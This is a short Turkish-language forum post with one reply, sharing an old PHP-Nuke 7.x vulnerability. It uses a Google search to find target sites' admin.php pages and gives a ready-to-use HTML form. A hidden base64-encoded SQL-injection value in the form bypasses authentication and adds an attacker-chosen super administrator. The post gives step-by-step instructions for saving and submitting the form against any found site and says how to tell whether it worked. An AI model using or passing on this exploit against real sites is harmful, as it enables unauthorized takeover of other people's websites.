Php-Nuke 7.X Açık
-
Arkadaşlar öncelikle vazgeçilmezimiz olan googleyi açıyoruz ve
Powered by PHP-Nuke inurl:/admin.php diyerek aratıyoruz.Bu arama bize php nuke ile yapılmış sitelerin admin.php lerini gösterdi.şimdi sıra geldi en önemli yere
<form name="mantr.. uot; method="POST" action="http://www.HEDEFSiTE.com/ADMIN.PHP">
<p>ADMIN:
<input type="text" name="add_aid" value = "Blue_Devil">
<br>
ADMIN TIPI:
<input type="text" name="add_name" value = "God">
<br>
SIFRE:
<input type="text" name="add_pwd" value = "123456789">
<br>
E-MAIL:
<input type="text" name="add_email" value ="sallama@email.com">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="ADMIN YAP">
<br>
</p>
</formBu kodları not defterine atıp htm dosyası olarak kaydediyoruz.sonra kodlardaki değişecek yerleri değiştiriyoruz.sitenin admin adresi ve atanacak admin nicki ve şifresi.Mail okadar önemli değil sallayın gitsin.bütün bilgileri girdikten sonra kaydet diyoruz ve htm dosyamızı açıp ADMiN YAP butonuna tıklıyoruz.Eğer karşımıza illegal operation veya ıdont like u gibi yazılar veya ip ban bloğu falan gelirse demekki bu sitede bu açık kapatılmış.Ama admin giriş sayfası gelirse adminimiz siteye enjekte edilmiştir.eski bir açık ama paylaşmak istedim
-
bu açık 7.x yazmışsın ama sadece bu kod 7.4de geçerli ayrıca bu konuda forumda var
